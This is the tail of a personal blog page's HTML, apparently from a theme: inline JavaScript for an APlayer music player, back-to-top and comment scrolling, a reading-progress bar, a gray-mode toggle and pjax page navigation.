  const musics = JSON.parse(`[{"name":"安河桥","artist":"宋冬野","url":"http://ting6.yymp3.net:82/new25/songdongye/11.mp3","cover":"https://img2.baidu.com/it/u=1260056724,1076343118&fm=253&fmt=auto&app=138&f=JPEG?w=500&h=500"},{"name":"卡布达","artist":"暂无","url":"music/kabuda.mp3","cover":"https://img2.baidu.com/it/u=705831265,2862720033&fm=253&fmt=auto&app=138&f=JPEG?w=500&h=500"}]`)
  const ap = new APlayer({
    container: document.querySelector('#aplayer'),
    audio: musics,
  })

  $(document).on('pjax:complete', function() {
    setOperateItem()
  })

  document.querySelector('.backtop').addEventListener('click', () => {
    backTopEvent();
  })
  const dom = document.querySelector('.turn-comment')
  dom && dom.addEventListener('click', () => {
    commentDomEvent();
  })

  function backTopEvent() {
    document.documentElement.scrollTo({
      top: 0,
      behavior: 'smooth'
    })
  }

  function commentDomEvent() {
    const commentDom = document.querySelector('.comments-intro')
    if (!commentDom) return
    const top = commentDom.offsetTop, height = commentDom.offsetHeight
    document.documentElement.scrollTo({
      top: top - 2 * height,
      behavior: 'smooth'
    })
  }
</script></div>
    </section>
  </div>
  <div id="progress" class="progress"></div>
  <div id="gray" class="gray"></div>

  <script>
    function initScroll () {
      document.addEventListener('scroll', () => {
        const doc = document.documentElement
        const scrollTop = doc.scrollTop
        const pageHeight = doc.offsetHeight
        const clientHeight = doc.clientHeight
        const ratio = scrollTop / (pageHeight - clientHeight)
        const progress = document.querySelector('#progress')
        const avatarImg = document.querySelector('.main-left--avatar')
        progress.style.width = (100 * ratio) + '%'
        avatarImg.style.transform = `rotate(${360 * ratio}deg)`
      })
    }

    const rootPath = "/"

    const checkAndSetArticlePageLayout = () => {
      const path = location.pathname.replace(rootPath, '');
      if (
        /^\/?\d{4}\/\d{2}\/\d{2}\/.*/.test(path) ||
        /^log\/.+/.test(path)
      ) {
        $('.main-container, .main-right, .main-right-wrapper').addClass('is-article')
      } else {
        $('.main-container, .main-right, .main-right-wrapper').removeClass('is-article')
      }
    }

    const gray = "none"
    const setGrayStyle = () => {
      if (gray === 'none') {
        return
      } else if (gray === 'index') {
        location.pathname === '/' ? $('#gray').show() : $('#gray').hide()
      } else if (gray === 'all') {
        $('#gray').show()
      }
    }
    setGrayStyle()


    window.onload = function () {
      checkAndSetArticlePageLayout()
      setTimeout(() => {
        $('#load').slideUp()
        $('#container').slideToggle()
        setTimeout(() => {
          initScroll();
        }, 500)
      }, 500)
    }
    
    let status = 0
    // 对所有链接跳转事件绑定pjax容器container
    $(document).pjax('a[target!=_blank]', '#main-container', {
      container: '#main-container',
      fragment: '#main-container',
      timeout: 8000
    })

    $(document).on('pjax:start', function() {
    })
    $(document).on('pjax:complete', function() {
      status = 0
      $('.main-container').addClass('to-up').on('animationend', function() {
        $(this).removeClass('to-up')
      })
      setGrayStyle()
      checkAndSetArticlePageLayout()
    })
    $(document).on('pjax:popstate', function() {
      status = -1
      checkAndSetArticlePageLayout()
    });
  </script>
</body>
</html>